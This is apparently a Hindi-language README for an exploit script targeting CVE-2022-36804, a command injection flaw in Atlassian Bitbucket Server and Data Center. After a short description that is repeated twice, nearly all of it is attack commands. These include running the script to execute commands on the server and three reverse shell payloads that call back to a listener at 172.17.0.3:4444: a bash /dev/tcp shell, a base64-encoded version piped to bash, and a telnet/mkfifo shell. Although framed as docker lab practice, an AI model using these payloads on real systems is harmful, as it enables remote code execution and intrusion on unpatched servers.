
अटलासियन बिटबकेट सर्वर और डेटा सेंटर के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन भेद्यता पाई गई। यह भेद्यता बिटबकेट सर्वर और डेटा सेंटर के संस्करण <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 और <8.3.1 से पहले जारी सभी संस्करणों को प्रभावित करती है
Atlassian Bit bucket Server और Data center के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन भेद्यता पाई गई। यह भेद्यता Bitbucket Server और Data Center के उन सभी संस्करणों को प्रभावित करती है जो <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> और <8.3.1 से पहले जारी किए गए थे।
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
172.17.0.3 को अपने स्थानीय IP पते से बदलें
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
netcat लिसनर इस प्रकार शुरू करें:
nc -lvp 4444
पेलोड एक्ज़ीक्यूशन त्रुटि की स्थिति में /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 को base64 में बदलें।
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
यदि आपको अभी भी कोई त्रुटि आ रही है, तो नीचे दिया गया कमांड चलाएँ:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
अभ्यास के लिए Windows/Linux मशीन में Bitbucket सर्वर का कमज़ोर संस्करण स्थापित करने की अनुशंसा की जाती है। Docker इमेज की तुलना में रिवर्स शेल प्राप्त करना आसान होगा।
अधिक जानकारी यहाँ पाई जा सकती है।